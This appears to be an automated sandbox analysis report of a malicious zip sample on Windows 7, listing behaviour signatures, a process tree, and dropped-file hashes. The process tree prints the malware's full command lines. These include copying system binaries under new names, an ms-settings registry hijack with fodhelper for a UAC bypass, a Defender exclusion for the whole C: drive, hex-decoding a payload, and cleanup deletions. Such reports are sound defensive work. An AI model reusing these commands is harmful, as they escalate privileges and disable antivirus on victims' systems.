Analysis

  • max time kernel
    146s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 09:58

General

  • Target

    17168848892.zip

  • Size

    676KB

  • MD5

    21aa22e186d07a35986264f71c3f2908

  • SHA1

    ae4a9fb6a15713115c5f68864bbab4c4b2094fd1

  • SHA256

    f4906dec2cbdc33af12960aada4dfb76ba22616363fe7fcb26190523ba1cf0f7

  • SHA512

    6fc5b97cff11faf1acd29b373067218fd5d202dee7d4cebc887e0ecad8648acd971e2c0487c9677f1aee97c12f13a1f4909667836e04800fee30fe7303598505

  • SSDEEP

    12288:YCfKAF6dLivsaQaOLi2PB2hXatDuQJy1tTs2u9bdNfOOY0hkwNzZ:hSAc+vsCAi2p2hKtDuvLzA/hn1Z

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17168848892.zip
    1⤵
      PID:2188
    • C:\Windows\system32\verclsid.exe
      "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
      1⤵
        PID:3060
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17168848892.zip"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2744
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\System32\extrac32.exe
          C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          2⤵
            PID:2988
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            2⤵
            • Executes dropped EXE
            PID:2992
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            2⤵
            • Executes dropped EXE
            PID:3004
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1864
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              3⤵
                PID:1912
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2496
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                3⤵
                  PID:2608
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2820
                • C:\Windows\system32\extrac32.exe
                  extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                  3⤵
                    PID:2828
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2844
                  • C:\Windows\system32\extrac32.exe
                    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    3⤵
                      PID:1328
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2248
                    • C:\Users\Public\xkn.exe
                      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2020
                      • C:\Users\Public\alpha.exe
                        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1312
                        • C:\Users\Public\ger.exe
                          C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                          5⤵
                          • Executes dropped EXE
                          • Modifies registry class
                          PID:1236
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1808
                    • C:\Users\Public\kn.exe
                      C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                      3⤵
                      • Executes dropped EXE
                      PID:2400
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2880
                    • C:\Users\Public\kn.exe
                      C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                      3⤵
                      • Executes dropped EXE
                      PID:1064
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:576
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM SystemSettings.exe
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:688
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                    2⤵
                    • Executes dropped EXE
                    PID:1816
                    • C:\Windows\system32\PING.EXE
                      ping 127.0.0.1 -n 2
                      3⤵
                      • Runs ping.exe
                      PID:304
                  • C:\Users\Public\Libraries\sppsvc.pif
                    C:\Users\Public\Libraries\sppsvc.pif
                    2⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:780
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 676
                      3⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:1648
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                    2⤵
                    • Executes dropped EXE
                    PID:1224
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                    2⤵
                    • Executes dropped EXE
                    PID:1756
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                    2⤵
                    • Executes dropped EXE
                    PID:1416
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:2340
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:1668
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:2984
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:1108
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:2928

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd

                  Filesize

                  2.4MB

                  MD5

                  b7d01eac3c560a510c573c4c99da95a5

                  SHA1

                  8129e8b1b26ffc249994b6272cbc14ffdd907d94

                  SHA256

                  397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec

                  SHA512

                  a1d93c930dc91b99ebc3398ede4f260b17b65df5a958eee1dcc3b78495c4f24bb04bae722d45d5cbb3fa76ecc728b0fdc2b2d4a42fc64618e23d452dab1b7a4f

                • C:\Users\Public\Libraries\sppsvc.pif

                  Filesize

                  819KB

                  MD5

                  6b8ff68a24697a15ac47255207740d9d

                  SHA1

                  db01dd1c00c213e8dd2b62bd4670fd0da71a6189

                  SHA256

                  95d6067492b2c592622a88ce2c35a8d7ff5e35ec94eb59decffc74d1ecae6e09

                  SHA512

                  1e569ef7337bffafb361a7e61bcc5e782e32746ba46153da900574d60b50a7941e55c540d89deeb2f758be2dcc04d41fd97fbad1564606169c25c231d05f3089

                • C:\Users\Public\ger.exe

                  Filesize

                  73KB

                  MD5

                  9d0b3066fe3d1fd345e86bc7bcced9e4

                  SHA1

                  e05984a6671fcfecbc465e613d72d42bda35fd90

                  SHA256

                  4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

                  SHA512

                  d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

                • C:\Users\Public\kn.exe

                  Filesize

                  1.1MB

                  MD5

                  ec1fd3050dbc40ec7e87ab99c7ca0b03

                  SHA1

                  ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                  SHA256

                  1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                  SHA512

                  4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

                • C:\Users\Public\sppsvc.rtf

                  Filesize

                  1.6MB

                  MD5

                  3cc0ffd10c8bacf6f9b68a17da21be8c

                  SHA1

                  35bad683b83eb60e459d4c81aec3bd6a62f849b1

                  SHA256

                  fadcab4e7cbf88e1173681625c7f3414e0faad45a11a90f5785d1304c55a8049

                  SHA512

                  52135b3ac29dfd48be9fa8ef95adb88807d09c57b666c7cb2e48661e07e5c9c99acf9fa6368c82fbd5bfd5b20fb816171745236fa200925a7cad8deaed15d27a

                • \Users\Public\alpha.exe

                  Filesize

                  337KB

                  MD5

                  5746bd7e255dd6a8afa06f7c42c1ba41

                  SHA1

                  0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

                  SHA256

                  db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

                  SHA512

                  3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

                • \Users\Public\xkn.exe

                  Filesize

                  462KB

                  MD5

                  852d67a27e454bd389fa7f02a8cbe23f

                  SHA1

                  5330fedad485e0e4c23b2abe1075a1f984fde9fc

                  SHA256

                  a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                  SHA512

                  327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

                • memory/780-67-0x0000000000400000-0x00000000004D5000-memory.dmp

                  Filesize

                  852KB

                • memory/2020-33-0x000000001B450000-0x000000001B732000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2020-34-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

                  Filesize

                  32KB